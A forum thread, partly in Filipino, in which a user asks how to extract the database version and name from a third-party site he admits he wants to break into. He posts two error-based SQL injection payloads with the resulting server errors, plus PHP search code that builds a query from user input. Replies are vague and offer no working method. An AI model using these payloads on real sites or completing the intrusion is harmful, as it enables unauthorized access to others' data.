What's new
  • Welcome to PHCorner Forums. Take a moment to Sign up and gain unlimited access and extra privileges that guests are not entitled to, such as: All that and more! Registration is quick, simple and absolutely free. Join our community today!

Sql injection

Destroyers

Leecher
Joined
Aug 2, 2016
Messages
7
Please help me sir.
The site have only one column
when i put union all select or union select 1 it showed


Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/cc1916/public_html/www3/apps/frontend/offres/offre.php on line 419

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/cc1916/public_html/www3/apps/frontend/offres/offre.php on line 440

when I put
or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1

or
+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

I'ts the same output
I cant get the version and database.
Please how to get the version,database?
please comment the command. ty
 

That Poppy

Eternal Poster
Established
Joined
Sep 13, 2013
Messages
1,907
depreciated na ginagamit mong mysql. gawin mong mysqli lhat ng query mo
 

N1ghtmare

Forum Veteran
Established
Joined
Nov 14, 2015
Messages
3,015
I think older version ang database na gamit niya kaya ganyan or maybe confused ka kung ilang column/s ba talaga ang meron siya.
 

Destroyers

Leecher
Joined
Aug 2, 2016
Messages
7
depreciated na ginagamit mong mysql. gawin mong mysqli lhat ng query mo
Teach me sir. I don't know how to use mysqli in website
I don't know where I gonna put this
<?php
function doSearch() {
$output = '';
if(isset($_POST['search'])) {
$searchq = $_POST['search'];
$searchq = preg_replace ("#[^0-9a-z]#i","",$searchq);
$sql = "SELECT * FROM entries WHERE name LIKE '%$searchq%' or description LIKE '%$searchq%' or content LIKE '%$searchq%'";
$query = mysqli_query($connect, $sql);
$count = mysqli_num_rows($query);
if($count == 0) {
$output = '<tr><tr>No results found.</tr></td>';
} else {
while($row = mysqli_fetch_array($query)) {
$eName = $row['name'];
$eDesc = $row['description'];
$eCont = $row['content'];
$id = $row['id'];
$elvl = $row['level'];
$ehp = $row['hp'];

$output .= '<tr><td><a href="You must register or login to view this.' .$id. '" onclick="document.linkform.submit();">'.$eName.'</a></td><td>'.$eDesc.'</td><td>'.$elvl.'</td><td>'.$ehp.'</td></tr>';
}
}
return $output;
}
}
that just example
 

That Poppy

Eternal Poster
Established
Joined
Sep 13, 2013
Messages
1,907
ani ba balak mo i achieve? yan ba code mo mo example mo lng
 

That Poppy

Eternal Poster
Established
Joined
Sep 13, 2013
Messages
1,907
Teach me sir. I don't know how to use mysqli in website
I don't know where I gonna put this
<?php
function doSearch() {
$output = '';
if(isset($_POST['search'])) {
$searchq = $_POST['search'];
$searchq = preg_replace ("#[^0-9a-z]#i","",$searchq);
$sql = "SELECT * FROM entries WHERE name LIKE '%$searchq%' or description LIKE '%$searchq%' or content LIKE '%$searchq%'";
$query = mysqli_query($connect, $sql);
$count = mysqli_num_rows($query);
if($count == 0) {
$output = '<tr><tr>No results found.</tr></td>';
} else {
while($row = mysqli_fetch_array($query)) {
$eName = $row['name'];
$eDesc = $row['description'];
$eCont = $row['content'];
$id = $row['id'];
$elvl = $row['level'];
$ehp = $row['hp'];

$output .= '<tr><td><a href="You must register or login to view this.' .$id. '" onclick="document.linkform.submit();">'.$eName.'</a></td><td>'.$eDesc.'</td><td>'.$elvl.'</td><td>'.$ehp.'</td></tr>';
}
}
return $output;
}
}
that just example
yang code mo kasi n yan png filter lng yan
 

That Poppy

Eternal Poster
Established
Joined
Sep 13, 2013
Messages
1,907
example ko lang yan


hindi try ko lang.
pero d ko naman dedeface papasukin ko lang
marami kacng site na katulad nyan pero kaya ng iba na pasukin
papasukin? gagayahin mo ba ung code nila or what?
 

That Poppy

Eternal Poster
Established
Joined
Sep 13, 2013
Messages
1,907
gusto ko häçkin din yung site
pero d ko idedeface
ang kailangan ko lang yung command para ma häçk yung website.
mahirap yan lalo na kung malalaking sites ang i häçk mo meron mga security features mga un
 

Destroyers

Leecher
Joined
Aug 2, 2016
Messages
7
mahirap yan lalo na kung malalaking sites ang i häçk mo meron mga security features mga un
and daming nakakahäçk na nung website na hinahäçk ko.
natatwa lang ako kac nagaagawan. kada araw iba iba yung defaced page.
kaya sinubukan ko pero ayaw. dko kaya. papatulong sana ako eh! kac yung ibang site na na incounter ko parehas lang dun. kaya kung malalaman ko kung pano siguro parehas lang sa iba yung command.

kira111101 parang pamilyar pangalan mo COD3X kaba?
 

Similar threads


Popular On This Forum

New Topics On This Forum

Forum statistics

Threads
569,784
Messages
11,103,901
Members
1,065,118
Latest member
ArCticBurst
Top